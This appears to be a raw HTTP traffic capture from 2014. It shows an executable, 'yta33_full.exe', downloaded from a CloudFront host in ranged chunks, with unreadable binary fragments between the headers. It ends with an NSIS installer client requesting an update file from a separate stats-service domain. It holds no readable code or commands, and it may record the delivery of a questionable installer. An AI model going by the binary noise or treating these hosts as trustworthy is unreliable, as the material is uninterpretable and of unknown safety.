    ..#dK......4u7.....(........X.>.C........9..^...U......D..Na.9]1...
    Y...{.....a2........l....N.........V..g..uM.7..M.{.W.M.e.M....r_g....&
    lt;@9(....$.........._?.Z..-..:...a........6!..B..J........K..=5$_..9Z
    .su{..A..;5.....Q.-..h.....S`.K..X.*.8..t....E..5..y...9..v....CK.3En.
    ....Z......=(N.`'..,.8.u......Z...T..%{.*;.N?..7ef7Ds.....z..V4...G...
    Q......j..vLPD..........Pi..qy.JV{.CY.A...\..m._..=8.....x..Uf-.en....
    E;BU...3.cgHOz...fI:..&.....m@J..:.A........P.. ..&.....AG.....6c...f.
    B..Jg sO..X....J...d`.7 ......xR!.....q!G3..f........(.T.8J..p ..s..&f
    Z.I....*:HL..M..=.``..JH.5.G....r[[email protected]?\ ......7............Z;..e
    O..............R.r.*z....9...lCN$'*#..x.7./../|......(..a".D48...$.)E.
    <2I.......3........".9hRF..,....}Q.y.....pb.a#.F4.P!.],Ku...g...D..
    .............4....t^..G7d:|.:.S..yRN..P......4...V`o..E...;._..a.w{...
    .....EE.AAt.Qb..xu....O)o...4UT<.s...Y.u.2..P..L..q.........\.k....
    ln..&...R...%Z.)H.........{........lh..Sg/........P.&.<.P....?..eci
    ..!*...gz,.."X\ ..'d..'.._..VK..t...Ya.z7........X...e.5.|Q..).(k.

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=1500000-1749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1500000-1749999/5377936
    Age: 76481
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: I7lq-KiEsTSS2sbVFtDkuQNQm9nVUIRb1-hA2J4Rkbz9kgtcMLlWOg==
    x..D;j.{<[email protected]....$.m.......y.0.3.......{..}...........z...P ..5.
    ..h]..Pg..a1...a<QP....$..O....?...M.rg.XuT.t........2....o<.RR.
    ~....7n....{......a%. .H=..~R.C0.P.......MLA%C..2-CdS......}..|.0&ul;.
    p...x..2...k....u..#.7R,.{.X.x.$....Z.......Y.u........9..]e9..5.)....
    ..._..N...q.zn`x_..Vn...%[email protected]}..[4C;Px..Y....I....}.MD_C.r1..
    ;.........rNLGI.......b7.c"."(..q.)[email protected]... .......V.
    ...zV..I..q...C..p...\.:.&.?.&..U......4.....q=1.H.hj..y.x...G...p..N.
    f.l..-%._.e.V=.s$..9o6Ic`"...z..6..?_..o*B...jB..`n..7...,.......W..j.
    ...B0....x.......P...p;.......)..\J...R2..Su.*.....:..Q*S0.'..E....'.E
    ......Y...>.L!...Esk.|P........1....j...........A.................:
    ~.u........E.7?Q([email protected]%S...z.rj.PM.........*..E.x}yLHh1...0
    .5.Jy...eK.#H.......0...]U.)}[email protected]..
    .$u..v.3Q."..A.T..U..........V.v..:.J..*......r7&...h.%..FF......-.2.V
    .E.6.A..9.\..$....7{...t.N. ....q..y.J..~..J.M....$.c.c1......6In.R.o{
    l.....5....#...h....-...L.J..p{...g.(..>......dA(..(.*_...E..A...[.
    [.'-....../[email protected]./......L`...F.h.$...0.`.."$ ..e...%.Kc
    *.t.E.$....{..u.eo}..iUH.4..}..!......D.{..".......P.......3.7,...q...
    >.....2a.}.......[Bakr.4...;)........pT.F.M.4....d...Wr.....#7.=..6
    ....G.bx.V\.e.0G#G....hG...|.9..B.A....... S...).J.]..N\../&,.J.=.Ofx.
    ............).g.>.........p..u.\.......3.Y..Z*.KE..QdW,..X.Q......J
    if........E1.po&...;....P&....pzyvh...i.I(p.*....x.H.`.....P......`.LE
    [email protected].=....by......3.{.c.=..,m

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=2000000-2249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2000000-2249999/5377936
    Age: 76485
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: vrZM0me6ckEm8rwcJTnWQJ3kgCWKFANTrDH9B1fWjQ0GBGPBXt7J7g==
    ZP.o....U.\.9..Av.G.J.z.qx......^Fm..X..JB $.ui. f..^x)7.m.\...u.Kz...
    ..... ...?...iE..2...5p...4h......l$...@..$...n-..,Z`.'d.|......:..K.O
    !XR....xz....B.IB...a..v.g...&.b.l..w.T ` 4e...._......W........X...EE
    HuQ. ..9..3.^p/.\.........%....a.EIQ~.;......E6.O.&..K.v.D....y..\.*p.
    .s...8.........0..-C..0..U....d^...qW... .3z..K..=..YG.....J.....n;..S
    ..".#n.e%.3.......*.%..$..T.0.....0......e.r.s........5..eL....I...b.S
    .qS......F......I@...<}'..............Q7.%0R.f.C.......O..&GK......
    |[email protected]........|.W...........M..`"K.#.:Y.UU|.........#4.NW...Nt
    .......~.....~.wp.$...........^.4..>..{r.......4T.....;.P..M'.....6
    .]......s.>e{;.?. >.(~.Km.....t..4..p>.d...v.......Z.i>>
    ;N...`. C2...%u.C..].f...F...Q..~... "....K6..../...48r.3.<VH.rX..B
    a....X. ......0.#.g........i...........#.%....Q...;.t......O...ay.[#Ge
    .1cG......1.T...Q$.n..G;.6y....gm...."^z.."..MG.............KQe!f.w...
    $......4.... .............m..È....W..PU...E|..N.....6.G.VN..G...%o..
    4:.l.C..g.x.. .a....bz..%...|*G..S{-<.......M...U..C..E8...,.......
    (.K....`..{.i1..Z&.'Jc...u-.......c.C.8...U..s....B.s....*.k..b.......
    ....Y.<{7t..._..U...=!O..........k.Y..>....GR.d...n-.._.cy?`..[!
    ...r.%........^......m.3k-..J.e.....t..3..T......~..<...$I...7....G
    ....V...w....3..m`)..n.....|...{...3..W"...ic../.Q..E..........O.cJ...
    ..............d..v.?...:m5|T.1{..7m...W..E.......S4...((..p.l3...0M.7.
    }...(..N..?...:f....[.2..[...#fO....;....A...fR3..g.7...3...8Q..L.J*.\
    ..0k5.B:.\|...........m9..]......B..* ^..A..hb5.a...~...Q.FaGS5...

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=2500000-2749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2500000-2749999/5377936
    Age: 76490
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: HwxS7d2Q4A5NTVIGDrmhhloSc9jiyfQDkPt6OeFRmv3JUnG-3d-TxA==
    ...w.J....J...6.vr..=.....m....t..UB}....H6...5^....<.;..G..G).G..l
    .....?.$0..C..K.oA)...b.....A.L.vd/7.:........ty=\N..D......Z.....w,..
    .../.N.R..a.E..:1q.....z....I<...1...t.x...V. ..R.].)'....*S.0KK...
    |R.z=.v;..-..p...{f4.MB=Y.....95.W`.Vg..{H..^ ^.1....X.B.(B.......K.9.
    ~a.......oNS,6kg.l.7`....>. ...l..2[A..mQP..2hNM......x..\[."......
    $...[@.|.r..-$......E.......ur.......P.x)NM..?..d=K25s.u....|"O./.x...
    ..O....F.F....7.L4............7.....}......../.8.n.5...~S&.........xe.
    .Q.?......o,^.0.NNM.....&..lXq....8..P.Q.7U,..rD.]1.p..d.5.Qs.>..2.
    .t6..x..]...pb......l.4.?....bn8J...#......Ck...z.y......m.......3B...
    .5OJA....k.....BLzg_.s.N.`0.S.P...~$I... ./.s..5p..h_.,.....P.<...
    ...Q..T.J...I.h.(./bhZ.V......^.....{...F.x.`....C..A...P!7.F..q.xC&..
    ....X...q....G}.3.c.....f...pt<..I._.*....bB.7.|..~.TD.x..`..E5k.o.
    N..]8..ZU9v/*.woxM.................O.......C...I.....geTZ=..~.*C..X..S
    .%.`Io..1.$...-c..U.\6...}...z#..2.4.[i....>....d..........a.......
    ..BB..=.hAC..2n....j....j......-i0..B...C.......t$.J.J..w....|..I.....
    .j........O.....P.2]....w......D.ah.g.1.Q.aY.;.. ....<.5...l.../.t]
    |.O.k...M;W*..r..{NxLK..#.Z[[email protected]..!.V....x.9.D....G.%(.t..}
    ...'...X.p.kt. .r.XJ.U..?....".@Ng......._/....-:.J].]..?....w..a...F.
    .7!&..o..D..i..K [email protected].`k....4..I.(..`Y\)#5K.w4...J.Z..#..Ft.
    ........y<.....?.c4....l'.~./98..G.jJ....Q..v984...iA....*.'.c.....
    ..L...CL..)C..."...R.y.MS. j..l.r...............v....<...6........Y
    .D........C../..;.G...X..q.f6.q.P#...4...2..&83.........r.._.X..7.

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=2750000-2999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2750000-2999999/5377936
    Age: 76495
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: VNJEOhQ-Gthq6d9O6O7olKqKFQFhhKWERWO6GddgWQW64iLMkfyupg==
    ....1..G.:...mH..FK.4T5MhN....S..{.a.i.;KJ.2V.....-.`.....;..l.......s
    ...]..X.e..3.v..8..=....Z1..f.Q.*...S8W....&...m|.tR..-`....ak...../%.
    ....i...y..3Dm../n..1....u<[email protected])....e\....0. ).....e...M..n
    ...x[$!QK3.....N..Ui..c.=.%.........%../.......i)(..3. . .N...;ShD....
    z....N.B.iUq...hWC._.n.a.....|.N..)4..A.Rs..........1,...W...O..e..;O.
    \S..y...#r...^/.........xD..m.....#/^@...#...].U.}'.pk.........!...!q.
    p.`|p..2..1qf....G....?.c~.XyT'...%...............~.....o.g#...6&,s~..
    7.FK..H...M2..Y2...!oQp.........{G.../Z...M...d.........G.' ..'..L:...
    .6.LOf..J.. .*.o.../.:_...ZGJW.."......M!lc.;.)....G.......-.%D..x...d
    {.ny/._......_....._.._6...g... [RS.$....X......E..>.][email protected].
    v...rO......D,...E.Br..n....../..F..._.uOg..b...8....[.v7m.o..kN......
    ..."..}/..<....!..y......dP.T.P.9../..........@....:.._..."...p....
    X..M...F ..........^[email protected]!..~|.'[email protected]|..I.N....o.n.......=3..SD
    .|L=^.;...E.;..3E.........M....6=D...:.......Z.......#.ss|.(n.T$r7t([.
    ......3....Td...Z...0..|:....B........B.....m.....E.\.,....T...p.!\.3/
    ..<.T.....d............}pqwT._.}. .o..S..w.d...W...3Hi.\....>...
    .....m?H.....]6........r1..Gs\M.....9Q]~.S..GaeN.<...;cA..l..s7dT..
    ....oW..k..g.%.:........C.....|.)..V.f.%......U..'....`..p..UM........
    ..;....`.f.....Y.k..}9;...(.hT...a.........)3.....S../.rR..U.......<
    ;c...ozo........ImH.Z.1.X..o.G..-..E....ZI!........*7R.....y...m...#z=
    ...myU..8...GC....\(l....N....Y.P...8~.?.. .vI8[.). 0...#........f...:
    .n.......C....c0.0..F.cO.I}B..} ...p...-.......x.kh2......'...cf..

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=3000000-3249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3000000-3249999/5377936
    Age: 76498
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: bA758G2k-kapRcH3ZWAnhVEKlV0hAejogEtR9e6lZGx1Uaq4X93HnQ==
    .s.ZRe.0.R.y.....]...n.DY....7.%......a.....[..ASU.uh.|o;....j.,"...h3
    .....M..9Z.l`.0c.. N.....{2<.{..q...........:..bq..O...q?x.3.......
    .=w .`..wQ ...[$..I...7.>{...2...,.*Q...rJ!....@(#.;.)...n........i
    l...[.G{..yF...)TJ5...{.-.....m.V..[./.;..5H^^.2.(..\.o.c.m2.e.....?..
    ..9..m.N...e......nZ.....&..a.i...p.. ..)[email protected]..=s.
    ..xb,.........Q#...l....cH~...u/.|..rU}c...3..A....'.0.<.=...O).$0.
    ;.....P.......;...,.<i{^.......B.%......[`Pp&...r.....>..*.2..z.
    ...t..K..p.. ..ot.n.4Z.......E.1..,<M.......g...?j..*....b0..o..`p.
    /.{!'.|.0.?..z.4].....O.;.&......"u.5..0u....."O.g.....A .q(,......an.
    ....w'..........a.............aV}.Rh.r.W..i.w..5N........k..U......=%.
    ...td..I.q.W/..n~u..d..V.x..".3.Ed.9..e..h....z.....a..C,..F.G...Qx..f
    N.,....k-.B"|.?...b...S.@`.X~.%..<2...$.X.."c..t!<....X...2. .*a
    .U....;)h._.8.e.. ...{[.5......>w.%i...m!a....[.s....$0..M..Ec5...C
    AL..B....k.L.9..D.~.. m.....jql.^.....].xVq..z...d...N\.R...m\...[.t.)
    .L........>BN..F..\...v....S.2.r.....G.c...F....iu.....zw...`R..f..
    *#... ..`o.B.|48..^.C........g~u=....b....iu....J..S....5........'$.w.
    ..y..3..8D..\..g{[email protected]..#-...... .y./I.._...'.Z..%.^?........*.f.
    .............DQ..V.R...:.=..~...H#.[".K..}...b..V....j'.f..R...T..M.F.
    b.F..E.....m-./...L.7":....d.z-]j...h...".2R...c.XT.v.'..~c5...9.a[(P.
    .^......u...,^~y...h.....oM......U...V.C..B....r..u,........0.X.K..l\.
    y.e.3..^..6YO},.....C.K.......[[email protected]..)(.!J..AZ..|........y
    e.awI.^T.....}[email protected]....>...A...."M.

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=3500000-3749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3500000-3749999/5377936
    Age: 76500
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: C3JmQTVyT-j9QzuEa32Ir2vW67H05GV5NZoz8iXVh2cbWN3yFEHOoA==
    ...f.x..........2..>.......1E.fW.P|.......#a^.M.....A.`x(h40...K.N.
    .QQ.N....R.T...-o.<.7qv....(.J..G..\..i........../..XEl. x@.{..tZ..
    .....6..A:. ....`..g,.........FY..Yw-.~..'p....>.,[..\[....p.g..b.&
    gt;..J...o.....o(.0}..fs{..<k.7...z?.....:.....<.g..%.~..N..~..I
    .........o..d..\....y:..Iva..<......N|.V.AT.....]s.~..Q.09.......[.
    ......l.......?.?...*.[((...;|.|..e.i.s.o..|.x..Y?...P..n.x....U....hy
    .........(.!...9."..zO..D.j......9.........X.>[email protected]..~'...9.....
    e.=m...].,......,{l.. .E.....[...........O.....1)X...y...S_...a.`un..(
    7...s..L.E......`z...i%...K...(.D...^/..T...6............2..~M.....N..
    .y ....k..j.j....na.....oz{ .l..... .O&r.h.....k..`-....m24v..."...'B.
    eu...RF(....g....A...C....k{^..._..q8A=...38g{...'....`z..*..0.K......
    f_.S4.E ..a.#ys..r.k...UX.q..$.Eo.YK|.EX.k....i...X6.W....'..<....5
    50.....@8=X)0..=E..e..&/..Lw...W...Ag\Al.}[email protected]..,.<
    ;x..h.........*...n.Pd..gt.........^<. `x/Y..z...O{Zr...skP3.^.....
    ]....K.Z.>b!..J......y..?v....X.^..g.Ux........,..7<....#.....N.
    je...x.\.Jc.C.`..-\....l.......c.7.1.J..*YQ.....R..e..C`..3..q...fSk..
    G`..dliML...ID.."9d...1.X.r7.#..DV.*v.^X(.....v..S..8rb..,0........F#0
    ..K[..C...5Tz.|.}.......d.(..-e..j....j.!..U,y..G.$.j"<......l.<
    ~... Q.......bI...:.......]......Y.b...`....ZK_....W;Z....kk.._*.Y....
    .b.W..J... [email protected]..,w.m.6 ...;9.."..6.....e.h*[email protected].~X....nFX.
    .F.k[....Fu....'.zs..}8...o....~..Q..t.........\..^.s.az..-2..@....%.,
    a.Z._.7..j.H..y4;...Z...]......=:f...T,.!..0=.j....0..c.I.vh...5..

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=4000000-4249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4000000-4249999/5377936
    Age: 76503
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: FW_iiXSScIC0AF2XwJj30MCi6VP_wLmPrLpMVEfGGX-GtfRtVJaOuw==
    x.H.....".O0...}(.f.;........^q...E.>..[a.o...).}.o.1B~........x...
    ".......^. ...G..7............VL.. =.*2..d.h.o...[...j.....0d/?.."...S
    .^...k-s...w==.k..(..=....f.W.kB .s....K....sK..........rG.v...w..[.S.
    .)........]..f..FI...7.#?..m;......7E........i..lc)...................
    ........'<.alz..k_M.....0....o.v....->.H.....U.[5(x..u.h!..Qm.7.
    .@.(J....... .Qh......s.I..a....D..fW..?.....kj...L....{..;..>.u...
    .B,.(..Ga....&j*""..e..7*{lqCP........B.U.s'==...x.>4-..!a]$p.<
    ..tz...xQ./.fA 6....D...0z.;.....h,,I&...%....0.........c~8..%...*...a
    .3.....?...?......3F......9P....WW.<....$..4./...z.........h....../
    Wc..G....].......G.s..3?....H:...v..h.p...I.I..~ .[[email protected]&.....
    .../.X.i....V..Iuh...S...^...Y..G...7.?..9.l,.F.I...HE..9z...O~.*8Y...
    N...\......n..';2.....C.......X!.....}0...!.-..A.E.W.C .v?j^G7n.....?.
    M..^..,u..C7.....m..Qa..t......w.=.6.;.mW......S.._........k.p.s.j_\..
    .......t...7`.%.A..VJ.U...............G....I.....cs...(.'D6...d...H..w
    .......Q .re.4z..,.....$...sW.3._.....2$.&b.d...>(..0..u.K....A....
    ..\|W.;f..t..~0-.{O.G.p.k......$.]....6.v.|....f..m.....d.U1..~.&cbj..
    ....<3w......hx......n....>>z...............f..j3.g....g.....
    .*....3...9...lR(.b.....^[email protected]...:...cz.:e.K,..!....
    .........."rvP.p......]....2....R?..kI.L^.<.^..h7..:.......^8..n...
    ..j."J.R._...<....z~./...Y.......]..IX.N.n*.[...t6Mz.....S..c...u..
    .... .).X... 06.9.OcE!F.N|.eTWk.....8........5.O....m.1.\......U`....,
    G.)4C.J...7.!.*..r%..\.p4...).p.r|j.np.".....d...H..i....uq ...T|G

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=4250000-4499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4250000-4499999/5377936
    Age: 76505
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: h1lBWB16fHF3BzEKugrCLY2fLq8iHWugqBqicocsH1l5BPa8xdVrow==
    .z,.d/M.......$......V..:.)....|k2g<X.F...~...&..7...d....I.'MHO..'
    ....k.....*...I..........(b......M...[...V..MM@<.8.`....].....Y[.c.
    s.2...&..9>A..'.H.K.Y{..5!5.*.....;Mf.....i...N..[.....h.`i...D-.Lh
    ....H....Z..r.rno.......(^[email protected]...._.... ...{.^..F.V.#r..)I3o.=..
    .x. ......NC.w./D..O..`^............,B-3.8.....PP......Q.{u.s../..!\.C
    k...(U/.AR.-......At.....~.O..)...] ....?...Ww....Q<Iq..Bm^r.....p.
    ...Yu._..?V#[email protected]...!~:\{.A....[!......*.3..w.....Q..?
    l.......].....zmhw..K.`...F............x.k..#.(%...F/.6;.)..g.?..uv..[
    .........?...#..^...-.......5g.{.-.....-.....gO ..z.u@%.-...).]..`._~H
    .'.o...h...j!.Y..7$....F..x..(..=(t|\C..3.'Q.U`....t.o......U......Z..
    3jeZ.K......9..b...6..5ak.....:......B...p...... ......K..u....<.C.
    .0.]..W..' .P.D..{.z.%..a.EQ,"....k..i.......zW.f....G..HZ....P... O..
    ......B.........%.._=..j....1Vf.:.%[email protected]..
    l..r....G.f.[...r9d.........W'.0_.........n. .%..3S)Y.|.....`6.!Y....$
    [email protected]({..F.2U..L.."...........S.......'M|.W`V .....Z..x..f.R...K
    t.|...D7{.F........k~g7..r..v.J. ..q.f...#.s....3.?U.?e....?.M%..M....
    l...4.a|StCU.........Y.J.9E?.el=...1.C..G.......]`J......~2....5...q."
    .q.S./Q...p.K..*...T.i1..@.....`.}a^.<.~H...r0D.}...//%|y.77......}
    ...$.M5d..|...... .<..U...._.L..8...s....8...7.....p7.Q..Eyp....5..
    YvB.e...S.. x.zz..bF%A.9.P.PC. ..M....) #x.zx.R..*[email protected]..
    T4I.......:..q.......=5....$.8..f.W.....(.B.v..R._...3..?..,.z.i..O./.
    ......P.s..\oQ.Y...M.......C.5.........`;..E'.!(b..!h. ...'u1...hW

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=4750000-4999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4750000-4999999/5377936
    Age: 76507
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: wxA7ZWovKiJKHXsLxAjqURXHxOtLWNrYGxWHTUqxwc90OLVoWLvLfQ==
    ....Hev0........lUt....i...........BZ.(]<...y._M.V ....j...m..9/~.H
    ...C].)~.QS.K.I}Cp.(......... ..c......K..wl...qU..\B.........-......9
    ."%D.X...@7.!Zf...e.2...ZH.v{.j....[p.2.vy._C..d...b2.,ia....p.a....O.
    .3.._k.g.........sK...B..I..I.P..!ld..Lz....bh.......[.a........=j....
    ....d.G&.."...46.V ......3....jJ..7..z.>...O.o.Oi. D}...n..=.%...|n
    @...j.~...D.....KW..Sm.."..s.vv.=}......ln...*..x..5x../. e$.K.....W..
    .............T..]........Ul..,.v..(.a.-....0.....,.r..........V.T. ...
    .R.z...H..Sh..`.lT.d..../q.u.............e... .J....l..6q..(.e...|`G?}
    ..z.e..f....<m.A...3.............-......`...1Ta..|.Lc..dd@S5.....;.
    .0..~H.@#AV...6bN7......._`*....s...GB.P..S...B. ([.`!6..y.a...A:.D...
    T.....#..ST.r.G....h].J.Dd...%.AI.....s.6...j.89....n.-..M%........H.T
    z...G.E7..!^...(...VU.....e....q1....o.<i..pK..,...../!..1Yv...B.h.
    (...,M2....v..b..0b...b..@...{y.qs.$*oH.h.....@'.B.._.Nq...pa<.vm.
    w...@>........Jr.YNa#..!..j.\..b$..o.Gz...2a...Yl...]].S.o.m...&h.N
    ..|#[email protected]..'RdE..-.......GM..h......P=t,k......................g
    .C...Z...o.X.....(.... U.5._.;#M........hI...)...J...X....q...!>.F.
    ..6..5H.|.H(:[email protected]/...a......g....#brZ.daf.D
    .3...1..C.......%....,.....~......~C.h......_......s.....ZG.G....Vy...
    ......Q......(3..TE.......m[.X.V....i28...$....!.'.>W. D....M_..-A.
    V,Pk5s;....?-I.....W.3....mU...Ft..fD.S='..a...........X...>g...6.1
    ..X...5.[..D...../.k1..K....r-_.W...xUxlB3....rXZ.....at..3~\.N.....8.
    ...fp.R.....F..WN..`.]........A..;..VN.MX..l3....;x!|..w%....1....

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=5250000-5377935
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 127936
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5250000-5377935/5377936
    Age: 76509
    X-Cache: Hit from cloudfront
    Via: 1.1 8e98b9699f72af4c81a0362f3956e3ac.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ZAUtQOP_IW5tgAFRFEHW8KQEhYUuNX9CC2pVy2hMTfdD__ozYT2JVg==
    .U.zQ.PQs.rN.R...4...[[email protected]..... &...!Y.=....<a..rG....d
    ..4.y{..O..)1.. G.~o]{b.HV.ks.tz..*cc.T.c..Q.0..|...7.!5x.. .....v..C.
    ...\..aa...z........*99......'....s... ..L_.xQ\......).w...M.[;...LQ..
    .Aa.48.....m..|.I.x.r..\;m~.....h.b..O.2..{.....WF.3..ha...#.E..!.....
    [email protected].../...K.......F..!.
    ...6)...C.9... C..p ...ku).u.8.S ..a.,[email protected]#%.x..j..../...5.
    ..8.z..q..).FUh/.D.....w.......E....B..j.U.!..N'.....8.F.BvX,.S(.^E.4.
    Z...q8.....)./~....g..`..^..L......7{.n~?...<.z.2./.......b...5?...
    .2.Y=.`.T....Q .......i.jy..M...4.U~.#.o...\.....A........9.QG........
    '*.LJ...v..../.."9..-V.5...G.LO...._i........n. xk...uH.M.@.....!..X95
    ..........,...DT...R....n#....b.....=.o|,..i...8..O..$S.>..7.RKqn..
    .....T....~...k&z_h/3.. [email protected]/.cB=H..
    [email protected]}W.2....x...I....1...1w..-n1R..i..-.z)30.....e.Kq.3.?.!.......&...
    .Q...9.q..7..Y?.x.E.....B>.... ......k....y$..*I...]5..&O.}.N)...f.
    .xU.(.km.b.......c.....[)A....d.a\l.LcLz.Lq:..g..t.W....n..V..H....*~.
    J...,....=..t.i..K....R..........t~!'a.2....T..E`"......~.F.L.......|.
    ..eK.*.......].Nn..-....'n.......R.&a....~.z.T..e.]....r.0.....5.E...=
    ....{d.....d8.....r...|u.K .g..d.L...7....!.>p......(&........}....
    ..|.....D........Q&}.....YfG#M....).*....:!...j.<.%.'...DkD..@|..C.
    .p#r...4ZC. w..{.nS.*'...o.....(7P3h...R..u....>Ec.F..C<......N=
    "'..C....A..K] .p......A%'~f.Z.~. .. ...#.........7.O4.S..B...w..sIc..
    q..(~.R$.g.........7.i..p.".F..N#W..|E.]..T..c....>........o...

    <<< skipped >>>

    GET /installer_updates/000046/update.json HTTP/1.1
    User-Agent: NSIS_Inetc (Mozilla)
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


